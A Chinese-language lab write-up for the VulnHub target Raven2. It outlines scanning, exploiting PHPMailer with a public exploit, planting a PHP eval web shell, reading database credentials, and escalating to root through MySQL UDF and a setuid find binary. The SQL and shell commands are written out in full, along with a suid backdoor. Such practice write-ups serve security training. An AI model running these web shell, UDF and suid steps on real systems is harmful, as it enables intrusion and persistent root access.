目录
vulnhub打靶–raven2
因为做过raven1了,raven2的wp有些重复的地方可能写的不清楚
可以看一下我上一篇raven1
Raven1–WP
Raven2下载
1.nmap扫ip
2.扫目录(wpscan会发现两个用户,没啥用,ssh连不上的)
3.打开/vendor/发现phpmailer
4.利用phpmailer公开exp打下
用的是4094.py
具体怎么用不说了,多看它exp里面注释
5.nc反弹shell ,可以使用echo写一个一句话进去,蚁剑连接后网站配置文件处发现数据库用户密码
eho '<?php @eval($_POST["cmd"]); ?>' >> file.php
6.连接数据库,发现可以使用udf提权
root用户,可以导入导出,版本较低
可以使用udf提权
上传脚本(同样使用searchexploit找)
7.udf提权步骤
具体命令
1.将.so库文件导出到plugin目录下
select load_file('/tmp/udf2.so') into dumpfile '/usr/lib/mysql/plugin/udf.so';
2.创建自定义函数
create function do_system returns integer soname 'udf.so';
#查询自定义函数是否创建成功
select * from mysql.func;
#创建一个uid获取root shell的方式
select do_system('chmod u+s /usr/bin/find');
#suid提权
find shell.php -exec /bin/bash -p \; #shell.php是随便一个存在的文件名,或者touch创建一个
8.留个suid后门
提权,拿到root
9.总结
感觉确实比上个要难一些。思路很多,综合性很强。
首先wpscan发现用户之后可以爆破
爆破失败后再根据其他信息拿shell,这里是phpmailer命令执行
再看他网站配置文件发现数据库密码,登进数据库
这里可以查数据库数据发现两个用户密码,拿去撞库,其中steven是可以撞出来。
但是它不允许ssh密码登录(应该是用RSA密钥,这里不太了解怎么配)
想到数据库运行用户为root,且它的mysql版本不高,能导入导出。尝试udf提权,提权成功拿下root权限
最后再次感觉到思路很重要。